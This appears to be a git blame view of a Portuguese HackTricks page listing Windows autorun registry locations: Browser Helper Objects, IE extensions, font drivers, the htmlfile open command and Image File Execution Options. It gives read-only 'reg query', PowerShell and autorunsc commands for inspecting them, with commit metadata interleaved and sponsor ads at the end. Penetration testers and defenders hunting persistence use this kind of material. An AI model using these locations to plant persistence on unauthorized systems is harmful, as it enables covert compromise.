Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Os BHOs são compatíveis com o Windows 10 via Internet Explorer 11, mas não são suportados no Microsoft Edge, o navegador padrão nas versões mais recentes do Windows.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
Para explorar os BHOs registrados em um sistema, você pode inspecionar as seguintes chaves do registro:
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
* `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
Cada BHO é representado por seu **CLSID** no registro, servindo como um identificador único. Informações detalhadas sobre cada CLSID podem ser encontradas em `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Para consultar BHOs no registro, esses comandos podem ser utilizados:
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
```bash
Update privilege-escalation-with-autorun-binaries.md add missing keyword `reg` for command `reg query`
2020-10-12 16:19:17 +00:00
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Extensões do Internet Explorer
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
* `HKLM\Software\Microsoft\Internet Explorer\Extensions`
* `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Observe que o registro conterá 1 novo registro para cada dll e será representado pelo **CLSID**. Você pode encontrar as informações do CLSID em `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Drivers de Fonte
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
* `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
* `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
### Open Command
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
* `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command`
* `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command`
```bash
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Opções de Execução de Arquivo de Imagem
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
```
GitBook: [master] 4 pages modified
2021-09-06 22:26:52 +00:00
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
```
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
## SysInternals
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Note que todos os sites onde você pode encontrar autoruns **já foram pesquisados por** [**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). No entanto, para uma **lista mais abrangente de arquivos auto-executados**, você pode usar [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) da Sysinternals:
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
```
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
autorunsc.exe -m -nobanner -a * -ct /accepteula
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Mais
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
**Encontre mais Autoruns como registros em** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Referências
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
* [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
* [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
* [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma **plataforma premium de bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100,000**!
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
<details>
Translated ['windows-hardening/active-directory-methodology/README.md',
2024-01-02 21:38:50 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
<summary>Suporte ao HackTricks</summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
{% endhint %}
Reference in a new issue Copy permalink